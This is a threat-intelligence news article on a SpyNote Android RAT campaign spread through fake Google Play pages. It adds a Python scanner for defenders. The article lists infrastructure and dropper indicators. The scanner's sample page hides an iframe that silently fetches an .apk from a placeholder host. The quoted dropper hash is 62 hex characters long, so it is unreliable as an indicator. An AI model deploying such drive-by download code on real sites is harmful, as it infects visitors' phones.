A sophisticated Android malware campaign has resurfaced, exploiting deceptive websites that perfectly mimic legitimate Google Play Store application pages to distribute the notorious SpyNote Remote Access Trojan (RAT).
This malicious operation targets unsuspecting users by creating static HTML clones of popular Android application install pages, complete with copied CSS styling and JavaScript functionality designed to trick victims into downloading malicious APK files directly from compromised servers.
The SpyNote malware represents a formidable threat in the mobile security landscape, functioning as a highly intrusive Android RAT with extensive surveillance capabilities.
Once installed, the malware can remotely control device cameras and microphones, manage phone calls, execute arbitrary commands, and perform sophisticated keylogging operations that specifically target application credentials.
The main concern is that it uses Android’s Accessibility Services to steal two-factor codes and trick users with fake screens.
DomainTools researchers identified this persistent campaign as a continuation of previous SpyNote activity, noting significant tactical evolution in the threat actor’s approach.
The malicious infrastructure predominantly utilizes two IP addresses – 154.90.58[.]26 and 199.247.6[.]61 – with domains registered through NameSilo LLC and XinNet Technology Corporation.
The fake websites consistently include specific JavaScript libraries and employ nginx servers hosted on Lightnode Limited and Vultr Holdings LLC infrastructure.
Advanced Infection Mechanism and Payload Delivery
The infection process begins when users encounter convincing Google Play Store mimics that trigger malicious downloads through a carefully crafted JavaScript function.
The core malicious functionality relies on a download() function that creates hidden iframes and sets their source to JavaScript URIs, effectively initiating APK downloads without users leaving the current page.
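As an added example (not code from the campaign or from the DomainTools report), a small Python scanner that scores a page against the behaviour just described: an iframe created at runtime, hidden, given a javascript: URI as its src, and pointed at an .apk. The sample HTML is constructed for the demonstration and the URL is a placeholder.

```python
import re

# Heuristics for the download() pattern described above. Each regex is one
# indicator; a page is flagged when enough of them co-occur.
INDICATORS = {
    "creates_iframe": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I),
    "hides_element": re.compile(
        r"display\s*[:=]\s*['\"]?none|visibility\s*[:=]\s*['\"]?hidden", re.I),
    "javascript_uri_src": re.compile(r"\.src\s*=\s*['\"]javascript:", re.I),
    "apk_reference": re.compile(r"\.apk\b", re.I),
}


def scan_page(html: str) -> tuple[int, list[str]]:
    """Return (score, names of matched indicators) for one HTML document."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(html)]
    return len(matched), matched


def is_suspicious(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` indicators are present."""
    return scan_page(html)[0] >= threshold


# Constructed sample modelled on the technique (placeholder URL, not a real site).
SUSPICIOUS_HTML = """
<button onclick="download()">Install</button>
<script>
function download() {
  var f = document.createElement('iframe');
  f.style.display = 'none';
  f.src = "javascript:window.location='https://example.invalid/Chrome.apk'";
  document.body.appendChild(f);
}
</script>
"""

# Constructed benign page: a plain embedded iframe with no runtime tricks.
BENIGN_HTML = '<iframe src="https://example.invalid/embed" width="1"></iframe>'

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_page(page), is_suspicious(page))
```

The threshold keeps a single legitimate `.apk` link or a hidden element from raising an alert on its own; tune it to the traffic you inspect.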
The malware employs a sophisticated multi-stage deployment process utilizing dynamic payload techniques and DEX Element Injection.
The initial dropper APK (Chrome.apk with hash 48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566) reads encrypted assets, generates decryption keys from its AndroidManifest file, and decrypts the second-stage SpyNote payload.
The dropper extracts the package name “rogcysibz.wbnyvkrn.sstjjs” to retrieve the 16-byte AES key “62646632363164386461323836333631” for payload decryption.
The malware demonstrates advanced anti-analysis capabilities through control flow obfuscation and identifier obfuscation, using random variations of characters like ‘o’, ‘O’, and ‘0’ for all function names.
This technique significantly complicates static analysis, while the dynamic loading mechanism ensures the primary malicious functions remain concealed until runtime execution, effectively bypassing traditional security detection methods.